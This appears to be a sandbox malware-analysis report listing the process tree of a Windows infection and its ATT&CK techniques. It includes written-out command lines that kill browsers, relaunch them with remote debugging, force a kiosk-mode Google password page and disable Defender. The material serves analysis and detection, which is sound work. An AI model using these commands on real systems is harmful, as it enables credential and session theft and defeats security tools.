C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1904 /prefetch:28⤵PID:12468
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2112,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2248 /prefetch:38⤵PID:12484
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2400 /prefetch:88⤵PID:5692
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3252 /prefetch:18⤵
- Uses browser remote debugging
PID:7288
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3536,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3552 /prefetch:18⤵
- Uses browser remote debugging
PID:7328
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3880 /prefetch:28⤵
- Uses browser remote debugging
PID:8312
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4704,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4684 /prefetch:18⤵
- Uses browser remote debugging
PID:9460
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4912,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4924 /prefetch:88⤵PID:11004
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5464,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5476 /prefetch:88⤵PID:11140
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:13232 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff78bff208,0x7fff78bff214,0x7fff78bff2208⤵PID:6880
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2064,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=2140 /prefetch:38⤵PID:5668
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1996,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:28⤵PID:5200
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2588,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:88⤵PID:5728
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:18⤵
- Uses browser remote debugging
PID:12944
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:18⤵
- Uses browser remote debugging
PID:13024
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5740,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=5780 /prefetch:88⤵PID:10212
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5732,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=5700 /prefetch:88⤵PID:10228
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,2307843264178515614,12466156252933359573,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:88⤵PID:10160
C:\Users\Admin\AppData\Local\Temp\10369240101\1204b818ae.exe"C:\Users\Admin\AppData\Local\Temp\10369240101\1204b818ae.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9620 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9648
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11568
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8136
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:4336
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:8584
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:8628 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {b8aa85ef-350d-48a2-8178-192c7df30257} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:9008
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2512 -prefsLen 27135 -prefMapHandle 2516 -prefMapSize 270279 -ipcHandle 2524 -initialChannelId {880771e4-d2fd-4747-89ce-a7394b49ffaa} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:9140
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3992 -prefsLen 25164 -prefMapHandle 3996 -prefMapSize 270279 -jsInitHandle 4000 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4004 -initialChannelId {dd129ccd-6acf-4d9b-8082-1a14a368556c} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:10016
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4184 -prefsLen 27276 -prefMapHandle 4188 -prefMapSize 270279 -ipcHandle 4196 -initialChannelId {d8fbdd7d-4c53-4518-b7fc-af2228016c2d} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:10060
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3148 -prefsLen 34775 -prefMapHandle 3152 -prefMapSize 270279 -jsInitHandle 3032 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2820 -initialChannelId {bab5a38f-f7d1-4036-8b5a-954c69ec8dab} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:10544
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5096 -prefsLen 35012 -prefMapHandle 5116 -prefMapSize 270279 -ipcHandle 5128 -initialChannelId {27eb71a3-88d6-4672-aedd-d78d08c124eb} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:3972
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5392 -prefsLen 32952 -prefMapHandle 5396 -prefMapSize 270279 -jsInitHandle 5400 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {116b84ff-6dd3-444e-94cd-46fbff395034} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:5992
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5448 -initialChannelId {2d53198a-a1f9-4122-bc85-b0405bd600aa} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:5944
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5364 -prefsLen 32952 -prefMapHandle 5356 -prefMapSize 270279 -jsInitHandle 5348 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5308 -initialChannelId {2b696205-4189-4f96-86b0-9b71bc04e503} -parentPid 8628 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8628" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:220
C:\Users\Admin\AppData\Local\Temp\10369250101\c96dd9ec4b.exe (tree depth 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\10369250101\c96dd9ec4b.exe"
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3564

C:\Users\Admin\AppData\Local\Temp\10369260101\c4f793a08b.exe (tree depth 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\10369260101\c4f793a08b.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:9476

C:\Users\Admin\AppData\Local\Temp\svchost015.exe (tree depth 7)
Command line: "C:\Users\Admin\AppData\Local\Temp\10369260101\c4f793a08b.exe"
- Executes dropped EXE
PID:8804

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4168

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
- Executes dropped EXE
PID:6040

C:\Windows\SysWOW64\WerFault.exe (tree depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2432 -ip 2432
PID:5140

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe (tree depth 1)
Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
PID:884

C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
PID:1480

C:\Windows\system32\cmd.exe (tree depth 1)
Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
PID:1760

C:\Windows\system32\cmd.exe (tree depth 1)
Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
PID:2196

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (tree depth 1)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
PID:3464

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8184

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
- Executes dropped EXE
PID:3164

C:\Windows\system32\cmd.exe (tree depth 1)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{3c976390-0aa9-4094-8a98-6f7106a2b202}\37f4cc3d-f27b-420b-957e-f6d811ab123d.cmd"0
PID:6512

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe (tree depth 1)
Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
PID:12512

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (tree depth 1)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
PID:1916

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:11636

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe (tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
- Executes dropped EXE
PID:11680
Network
MITRE ATT&CK Enterprise v15 (technique, number of matching behaviors)
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (4)
  - Windows Service (4)
- Modify Authentication Process (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (4)
  - Windows Service (4)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Impair Defenses (6)
  - Disable or Modify Tools (5)
  - Safe Mode Boot (1)
- Modify Authentication Process (1)
- Modify Registry (7)
- Pre-OS Boot (1)
  - Bootkit (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (4)
  - Credentials In Files (4)
Downloads